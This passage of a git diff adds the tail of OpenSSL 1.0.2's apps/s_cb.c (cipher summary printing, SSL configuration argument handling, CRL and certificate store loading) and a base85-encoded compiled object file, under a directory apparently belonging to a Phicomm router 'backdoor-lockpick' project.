+        else if (!memcmp(rlist, scsv_id - num + 3, num))
+            BIO_puts(bio, "SCSV");
+        else {
+            size_t j;
+            BIO_puts(bio, "0x");
+            for (j = 0; j < num; j++)
+                BIO_printf(bio, "%02X", rlist[j]);
+        }
+    }
+    BIO_puts(bio, "\n");
+}
+
+void print_ssl_summary(BIO *bio, SSL *s)
+{
+    const SSL_CIPHER *c;
+    X509 *peer;
+    /*
+     * const char *pnam = SSL_is_server(s) ? "client" : "server";
+     */
+    BIO_printf(bio, "Protocol version: %s\n", SSL_get_version(s));
+    print_raw_cipherlist(bio, s);
+    c = SSL_get_current_cipher(s);
+    BIO_printf(bio, "Ciphersuite: %s\n", SSL_CIPHER_get_name(c));
+    do_print_sigalgs(bio, s, 0);
+    peer = SSL_get_peer_certificate(s);
+    if (peer) {
+        int nid;
+        BIO_puts(bio, "Peer certificate: ");
+        X509_NAME_print_ex(bio, X509_get_subject_name(peer),
+                           0, XN_FLAG_ONELINE);
+        BIO_puts(bio, "\n");
+        if (SSL_get_peer_signature_nid(s, &nid))
+            BIO_printf(bio, "Hash used: %s\n", OBJ_nid2sn(nid));
+    } else
+        BIO_puts(bio, "No peer certificate\n");
+    if (peer)
+        X509_free(peer);
+#ifndef OPENSSL_NO_EC
+    ssl_print_point_formats(bio, s);
+    if (SSL_is_server(s))
+        ssl_print_curves(bio, s, 1);
+    else
+        ssl_print_tmp_key(bio, s);
+#else
+    if (!SSL_is_server(s))
+        ssl_print_tmp_key(bio, s);
+#endif
+}
+
+int args_ssl(char ***pargs, int *pargc, SSL_CONF_CTX *cctx,
+             int *badarg, BIO *err, STACK_OF(OPENSSL_STRING) **pstr)
+{
+    char *arg = **pargs, *argn = (*pargs)[1];
+    int rv;
+
+    /* Attempt to run SSL configuration command */
+    rv = SSL_CONF_cmd_argv(cctx, pargc, pargs);
+    /* If parameter not recognised just return */
+    if (rv == 0)
+        return 0;
+    /* see if missing argument error */
+    if (rv == -3) {
+        BIO_printf(err, "%s needs an argument\n", arg);
+        *badarg = 1;
+        goto end;
+    }
+    /* Check for some other error */
+    if (rv < 0) {
+        BIO_printf(err, "Error with command: \"%s %s\"\n",
+                   arg, argn ? argn : "");
+        *badarg = 1;
+        goto end;
+    }
+    /* Store command and argument */
+    /* If only one argument processed store value as NULL */
+    if (rv == 1)
+        argn = NULL;
+    if (!*pstr)
+        *pstr = sk_OPENSSL_STRING_new_null();
+    if (!*pstr || !sk_OPENSSL_STRING_push(*pstr, arg) ||
+        !sk_OPENSSL_STRING_push(*pstr, argn)) {
+        BIO_puts(err, "Memory allocation failure\n");
+        goto end;
+    }
+
+ end:
+    if (*badarg)
+        ERR_print_errors(err);
+
+    return 1;
+}
+
+int args_ssl_call(SSL_CTX *ctx, BIO *err, SSL_CONF_CTX *cctx,
+                  STACK_OF(OPENSSL_STRING) *str, int no_ecdhe, int no_jpake)
+{
+    int i;
+    SSL_CONF_CTX_set_ssl_ctx(cctx, ctx);
+    for (i = 0; i < sk_OPENSSL_STRING_num(str); i += 2) {
+        const char *param = sk_OPENSSL_STRING_value(str, i);
+        const char *value = sk_OPENSSL_STRING_value(str, i + 1);
+        /*
+         * If no_ecdhe or named curve already specified don't need a default.
+         */
+        if (!no_ecdhe && !strcmp(param, "-named_curve"))
+            no_ecdhe = 1;
+#ifndef OPENSSL_NO_JPAKE
+        if (!no_jpake && !strcmp(param, "-cipher")) {
+            BIO_puts(err, "JPAKE sets cipher to PSK\n");
+            return 0;
+        }
+#endif
+        if (SSL_CONF_cmd(cctx, param, value) <= 0) {
+            BIO_printf(err, "Error with command: \"%s %s\"\n",
+                       param, value ? value : "");
+            ERR_print_errors(err);
+            return 0;
+        }
+    }
+    /*
+     * This is a special case to keep existing s_server functionality: if we
+     * don't have any curve specified *and* we haven't disabled ECDHE then
+     * use P-256.
+     */
+    if (!no_ecdhe) {
+        if (SSL_CONF_cmd(cctx, "-named_curve", "P-256") <= 0) {
+            BIO_puts(err, "Error setting EC curve\n");
+            ERR_print_errors(err);
+            return 0;
+        }
+    }
+#ifndef OPENSSL_NO_JPAKE
+    if (!no_jpake) {
+        if (SSL_CONF_cmd(cctx, "-cipher", "PSK") <= 0) {
+            BIO_puts(err, "Error setting cipher to PSK\n");
+            ERR_print_errors(err);
+            return 0;
+        }
+    }
+#endif
+    if (!SSL_CONF_CTX_finish(cctx)) {
+        BIO_puts(err, "Error finishing context\n");
+        ERR_print_errors(err);
+        return 0;
+    }
+    return 1;
+}
+
+static int add_crls_store(X509_STORE *st, STACK_OF(X509_CRL) *crls)
+{
+    X509_CRL *crl;
+    int i;
+    for (i = 0; i < sk_X509_CRL_num(crls); i++) {
+        crl = sk_X509_CRL_value(crls, i);
+        X509_STORE_add_crl(st, crl);
+    }
+    return 1;
+}
+
+int ssl_ctx_add_crls(SSL_CTX *ctx, STACK_OF(X509_CRL) *crls, int crl_download)
+{
+    X509_STORE *st;
+    st = SSL_CTX_get_cert_store(ctx);
+    add_crls_store(st, crls);
+    if (crl_download)
+        store_setup_crl_download(st);
+    return 1;
+}
+
+int ssl_load_stores(SSL_CTX *ctx,
+                    const char *vfyCApath, const char *vfyCAfile,
+                    const char *chCApath, const char *chCAfile,
+                    STACK_OF(X509_CRL) *crls, int crl_download)
+{
+    X509_STORE *vfy = NULL, *ch = NULL;
+    int rv = 0;
+    if (vfyCApath || vfyCAfile) {
+        vfy = X509_STORE_new();
+        if (!X509_STORE_load_locations(vfy, vfyCAfile, vfyCApath))
+            goto err;
+        add_crls_store(vfy, crls);
+        SSL_CTX_set1_verify_cert_store(ctx, vfy);
+        if (crl_download)
+            store_setup_crl_download(vfy);
+    }
+    if (chCApath || chCAfile) {
+        ch = X509_STORE_new();
+        if (!X509_STORE_load_locations(ch, chCAfile, chCApath))
+            goto err;
+        SSL_CTX_set1_chain_cert_store(ctx, ch);
+    }
+    rv = 1;
+ err:
+    if (vfy)
+        X509_STORE_free(vfy);
+    if (ch)
+        X509_STORE_free(ch);
+    return rv;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_cb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_cb.o
new file mode 100644
index 0000000000000000000000000000000000000000..b92433bca63293cb7ac90ff6bf9309e9651254db
GIT binary patch
literal 42632
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
